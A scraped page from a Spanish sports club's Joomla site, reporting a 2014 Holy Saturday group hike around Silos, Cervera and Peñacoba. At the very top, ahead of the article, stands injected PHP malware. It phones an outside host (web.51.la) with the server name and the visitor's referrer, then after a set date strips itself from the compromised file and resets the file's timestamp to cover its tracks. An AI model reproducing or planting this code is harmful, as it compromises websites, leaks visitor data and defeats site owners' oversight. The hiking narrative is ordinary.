check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456731446){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=5&id=18776729&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_contact/models/content.php"); } En el alto no habia cerveza, solo Cervera y su Cascajera.

La Aficin

Acceso Privado Equipo

En el alto no habia cerveza, solo Cervera y su Cascajera. PDF Imprimir E-mail
Martes, 29 de Abril de 2014 22:26

El da de Sbado Santo comenzamos nuestra temporada de caminatas. El da anterior no sabamos cuantos bamos a ir, pero tuvimos una agradable sorpresa ya que se presentaron 25 personas, muchas de ellas que no participaron en las rutas anteriores, lo cual alegra incluso ms, marcamos la cita a las nueve en punto: M Jess, Diego, Dori, Emilio, Visi, Raquel; Iaki, Arantza, Justo, Alex, Vicente, Alberto, Marina, Mati, Jess, Miguel Cmara, Miguel Malagueo, Juanito, Mxi, Too, M Carmen, dos Hinojareos Jos y Balta, Csar y Kami.

Y la verdad que ms o menos todos han sido puntuales, pero vivimos unos minutos de caos debido, a que aunque ya que pareca que estbamos todos alguno se iba a casa porque se le olvidaba algo, pero por fin ms o menos a las nueve y cuarto arrancamos nuestra primera marcha de temporada.

El tiempo era idneo para hacer una caminata de estas caractersticas, tenamos un da soleado, con una temperatura agradable,

Tenamos 23 km por delante con una dificultad media en algunos tramos.

Salimos haca las huertas direccin puente San Andrs, aqu cogimos un camino por el margen izquierdo de Mataviejas, despus del viejo molino llegamos a Ermita de Santa Cecilia, aqu nos reagrupamos ya que bamos bastante desperdigados.

Despus nos espera el primer repecho hasta Barriosuso, que es donde tomamos nuestra primera foto conmemorativa ya que dos integrantes del grupo vuelven a Silos.

En este punto comienza un bonito y duro ascenso, por una senda estrecha pero cmoda, una vez culminada la primera parte, nos reagrupamos de nuevo e inmortalizamos el momento, es decir un rato para respirar y suspirar (no por el cansancio, sino por el impresionante paisaje) pero estos suspiros tambin se deban a lo que nos esperaba y lo que veamos por delante.. la tan temida por much@s Cascajera.

Al final aunque impresiona, creo que todos nos dimos cuenta que no ha sido para tanto, subimos en fila india, ayudando nos unos a otros.

Una vez arriba seguimos el camino y ascendiendo un poco ms nos presentamos a casi 1400 m, nos quedamos sin aliento, no tanto por el esfuerzo sino por las maravillosas vistas que nos ofrece la Pea o el alto de Cervera, momento que parte del grupo aprovecha para salir pitando haca una de las partes ms importantes de la ruta, la zona de Cervera que da a La Yecla y aqu ya las vistas pasan a un segundo plano, es la hora del.ya no temido pero deseado ALMUERZO, se abren las mochilas se ocupan posiciones y empieza la carrera a dos papos, todos callados seguimos admirando las vistas pero llenando nuestras panzas..

Una vez nutridos e hidratados, momento foto al lado de la rplica de la iglesia de Hinojar con la placa conmemorativa de la Asociacin Cultural de San Bartalom estamos a 1387m exactamente.

Comenzamos el descenso direccin Hortezuelos, el grupo se estira y algunos comienzan a notar los primeros sntomas de cansancio.

Una vez llegamos a la carretera cerca de Hortezuelos, nos reagrupamos, algunos se quejan, de los pies, piernas e incluso las uas resentidas.

Aqu se separan 4 andarines y toman la decisin de seguir por la carretera direccin la Yecla y despus Silos, el resto se dirige haca Hortezuelos para recargar las botellas de agua y tomar direccin Peacoba. Finalmente no elegimos el camino fcil: todo por el Pinar sino que acortamos por las tenadas, al principio senda cmoda, cuando perdemos la senda y preguntamos como no a nuestro serpa local Juanito enfilamos ladera arriba con toda la solana y entre piedra y piedra, a penas hay arena ni vegetacin, en cuanto a la fauna suponemos que lagartijas. Pareca los Monegros pero empinado y en Peacoba.

Llegamos a la cumbre en la que se agradece y mucho la sombra, nos juntamos y vamos en busca de camino de Serralba direccin a Peacoba, camino muy amplio y cmodo.

Dejamos Peacoba a la izquierda, la gente no se quiere hidratar solamente quieren llegar a Silos, eran casi las tres y el sol calentaba. Estamos en terreno conocido, el grupo acelera y se alarga. En esta parte final de la ruta algunos integrantes del grupo empiezan a sentir, seriamente sus piernas y sus pies, pero ya queda poco y nadie se queja; prxima parada la Ermita de la Virgen del Camino en Silos, es donde nos reagrupamos una vez ms y como no. foto, tmido retoque de campana para anunciar la llegada, (era la hora de comer y nadie nos recibi).

Aqu nos despedimos y como siempre con muy buenas impresiones, un da maravilloso en buena compaa, algo cansados y con ganas de ir a comer a casa, pero muy satisfechos.

Desde el Club deportivo Silos nos alegramos mucho de que cada vez se anime ms gente y nos gustara que aquellos que lo estis leyendo u oigis hablar de ello os animis a participar en nuestra prxima ruta que en breve anunciaremos en la web del Club y en el Facebook y como no en los carteles, as que echadle un vistazo de vez en cuando.

Escribir un comentario

Código de seguridad
Refescar

Banner

Colaboradores

By vicencid. Potenciado por Jommla!. Valid XHTML and CSS.